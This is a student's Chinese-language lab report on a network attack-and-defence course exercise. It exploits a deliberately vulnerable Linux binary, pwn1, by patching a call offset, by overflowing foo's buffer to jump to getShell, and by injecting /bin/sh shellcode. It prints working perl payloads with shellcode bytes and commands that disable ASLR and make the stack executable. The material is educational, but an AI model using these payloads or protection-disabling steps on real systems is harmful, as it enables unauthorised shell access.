20212914 2021-2022-2 《网络攻防实践》第九次（第十一周）作业

1.实践内容

1.1 实践介绍

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。

1.2 学习内容

什么是漏洞，漏洞有什么危害？

漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。

出现漏洞可能会被骇客利用，破坏或非法访问系统，进行非法行为，从而造成损失。

NOP, JNE, JE, JMP, CMP汇编指令的机器码

• NOP：NOP指令即“空指令”，机器码为：0x90
• JNE：条件转移指令，如果不相等则跳转，机器码为：0x75
• JE：条件转移指令，如果相等则跳转，机器码为：0x74
• JMP：无条件转移指令，机器码为：
• Short Jump（短跳转）：0xEB；
• Near Jump（近跳转）：0xE9；
• Far Jump（远跳转）：0xEA
• CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果，机器码为：0x39

2.实践过程

1.手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

（1）下载并解压文件pwn1，用objdump -d pwn1 | more反汇编并分页显示。

（2）通过/main找到主函数位置，找到汇编指令：call 8048491 ，他对应的机器指令为：e8 d7 ff ff ff，e8为跳转，后面的四个字节为偏移地址。执行call指令，保存堆栈信息，并且EIP会指向下一条指令地址，即80484ba。

经过计算，我们可以发现。当执行e8 d7ffffff时，就会执行EIP + d7ffffff这个位置的指令。而d7ffffff是补码，表示-41，41=0x29。80484ba + d7ffffff= 80484ba-0x29正好是8048491，即foo函数所在地址。

所以，只要修改机器指令，修改偏移地址，使执行call函数时，转到调用getshell函数，就完成了攻击。

（3）getshell函数的地址为0804847d，通过计算器，计算0804847d-80484ba，得到补码，即要修改的偏移地址为：c3ffffff。

下面来修改可执行文件。将call指令的目标地址由d7ffffff变为c3ffffff。

使用vi编辑pwn2文件，打开后发现是一堆乱码

是因为已汇编为机器代码，需要进入十六进制模式，输入:%!xxd，并输入/d7查找e8d7ffffff

接下来修改地址，将d7改为c3,按r后可以更改，输入:%!xxd -r将16进制转换为原格式后退出。

再输入objdump -d pwn2 | more反汇编查看指令是否更改

（4）现在运行pwn1和pwn2。发现pwn2可以输入系统命令，pwn1还是输入字符串并输出的功能。可见，攻击成功。

2.利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

（1）分析foo代码
该可执行文件正常运行是调用函数foo，这个函数有Buffer overflow漏洞，即向这个缓冲区填入超出长度的字符串，多出来的内容会溢出并覆盖相邻的内存，当这段字符串设定后，就有可能会覆盖返回地址，使返回地址指向getshell，达到攻击目的。

分析lea -0x1c(%ebp),%eax语句，我们知道：foo函数读入字符串，但系统只预留了28字节的缓冲区，超出部分会造成溢出，这样就可以覆盖返回地址。

(2)确认输入字符串哪几个字符会覆盖到返回地址
使用gdb调试功能，输入32个字符，查看调试结果，其中EIP的值为0x35353535。

再次调试程序，继续查看EIP中的值。EIP中值为0x34333231，分别为4、3、2、1的ASCII码值，即输入的1234被覆盖到堆栈上的返回地址。

（3）1234最终会覆盖到堆栈上的返回地址，只要把1234替换为getShell的内存地址，输给pwn1，pwn1就会跳转到getShell函数。
由于数据按小端存储，因此我们应该输入：
11111111222222223333333344444444\x7d\x84\x04\x08
由于没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，需要用到perl功能翻译
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"'

将该字符串用./pwn1输入，运行后输入该字符串，会提示段错误，没有跳转到getShell函数，说明我们复制显示出的字符串并不是翻译得到的正确值。

因此使用16进制查看指令xxd查看input文件的内容。然后将input的输入，通过管道符“|”，作为pwn1的输入(cat input;cat) | ./pwn1。可以看到攻击成功，我们可以执行系统指令了。

3.注入一个自己制作的shellcode并运行这段shellcode

（1）准备工作
依次输入：
apt-get install execstack //安装execstack命令
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化

（2）构造要注入的payload
Linux下有两种基本构造攻击buf的方法：
retaddr+nop+shellcode
nop+shellcode+retaddr
nop一为是了填充，二是作为“着陆区/滑行区”
我们猜的返回地址只要落在任何一个nop上，自然会滑到我们的shellcode

利用十六进制编辑指令perl构造一个字符串，写入到input_shellcode文件中用作文件执行时的输入。在这段字符串中，末尾的\x4\x3\x2\x1会覆盖到堆栈上的返回地址。
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

（3）接下来确定\x4\x3\x2\x1到底该填什么：
打开一个终端注入这段攻击buf：(cat input_shellcode;cat) | ./pwn1

再开另外一个终端，用gdb来调试pwn1这个进程：
用ps -ef | grep pwn1命令找到pwn1的进程号是：1689

用gdb、attach 1689命令启动gdb调试这个进程：

用disassemble foo命令反汇编，通过设置断点，来查看注入buf的内存地址：
对foo进行反汇编查看到ret的地址为0x080484ae

在0x080484ae处设置断点，输入break *0x080484ae
在之前的终端中按下回车，然后在调试的终端中输入c继续运行。
输入info r esp查看栈顶指针所在的位置，并查看改地址存放的数据：

用x/16x 0xffffd16c命令查看其存放内容，看到了0x01020304，就是返回地址的位置。根据我们构造的input_shellcode可知，shellcode就在其后（+4），所以地址应为0xffffd170：

（4）修改文件中代码为
perl -e 'print "A" x 32;print "\x70\xd1\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
执行(cat input_shellcode;cat) | ./pwn1，如下图所示攻击成功，执行shell功能：

3.学习中遇到的问题及解决

• 问题1：无法安装execstack包
  

• 问题1解决方案：
  第一步：打开sources.list文件
  sudo vim /etc/apt/sources.list
  第二步：在文件中添加以下内容
  deb http://http.kali.org/kali kali-rolling main contrib non-free
  deb http://http.kali.org/kali sana main non-free contrib
  deb http://security.kali.org/kali-security sana/updates main contrib non-free
  deb http://old.kali.org/kali moto main non-free contrib
  然后保存退出，再进行更新
  sudo apt-get update

4.实践总结

本次实验通过上机操作，尝试了三种方法的攻击手段，漏洞的原因是一段程序产生的，所以这需要我们很熟悉汇编指令。第一种方法简单粗暴，直接修改机器指令，这仅需要我们熟悉代码。后两种方法需要对堆栈熟练掌握，才能摸清溢出到何处，如何找到EIP的地址等。在操作过程中还需要熟悉linux命令，比如perl，管道符的方法将perl的内容写进pwn中等，当一条路走不通时，如果你懂得变通，并且熟悉很多指令，你就可以想到其他的方法去解决问题。真实的漏洞情况肯定比这个困难的多，这需要我们拥有更多的知识，更多的技巧和更多的头脑。